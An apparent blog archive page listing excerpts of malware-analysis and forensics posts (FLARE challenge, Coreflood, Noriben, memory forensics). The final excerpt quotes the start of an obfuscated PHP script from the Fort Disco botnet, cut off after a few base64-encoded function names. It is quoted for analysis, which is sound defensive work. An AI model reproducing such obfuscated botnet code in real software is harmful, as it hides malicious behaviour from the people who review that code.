The FireEye Labs Advanced Reverse Engineering (FLARE) challenge was causing a bit of a buzz when it was announced and launched in early July. It read like a recruitment campaign for a new division within FireEye, but still a fun challenge to partake in. The challenge started … and I was on-site at a client …
In the previous post I showed some dynamic analysis procedures for a variant of a trojan known to Symantec as Coreflood. Based on the dynamic analysis, we discovered that the analyzed sample contained very few strings of use. It decrypted an embedded executable, which was injected into memory for execution. It dropped an encrypted file to …
I had the honor of lecturing for Champlain College’s graduate level Malware Analysis course this week. One of the aspects of the lecture was showing off dynamic analysis with my Noriben script and some of the indicators I would look for when running malware. While every malware site under the sun can tell you how …
Disclaimer: This post is based upon experiences I found when sending malware via GMail (Google Mail). I’m documenting them here for others to: disprove, debate, confirm, or to downplay its importance. Update: In the comments below, a member of Google’s AntiVirus Infrastructure team provided insight into this issue. A third-party AV engine used by GMail …
This site, Ghetto Forensics, was started this year as the beginning of an effort to better document some of the side work that I do that I thought would be appealing, or humorous, to the overall industry. This content was originally posted to my personal web site, thebaskins.com, but really needed a site of its …
When I first start delving in memory forensics, years ago, we relied upon controlled operating system crashes (to create memory crash dumps) or the old FireWire exploit with a special laptop. Later, software-based tools like regular dd, and win32dd, made the job much easier (and more entertaining as we watched the feuds between mdd and …
It’s been a few months since the last official release of Noriben. The interim time has been filled with a few ninja-edits of updated filters, and wondering what to put in next. Noriben started out as a simple wrapper to Sysinternals procmon to automatically gather all of the runtime details for malware analysis within a …
In the world of incident response and malware analysis, Java has always been a known constant. While many malware analysts are monitoring more complex malware applications in various languages, Java is still the language of love for drive-by attacks on common end-users. It is usually with certainty that any home user infection with malware such …
One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to …
This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below: <? $GLOBALS[‘_584730172_’]=Array(base64_decode(‘ZXJy’ .’b’ .’3JfcmVw’ .’b’ .’3J0aW5n’),base64_decode(‘c’ .’2V0X3RpbWV’ .’fbGl’ .’taXQ’ .’=’),base64_decode(” .’ZG’ .’Vma’ .’W’ .’5l’),base64_decode(” .’ZGlyb’ .’mFtZQ==’),base64_decode(‘ZGVm’ …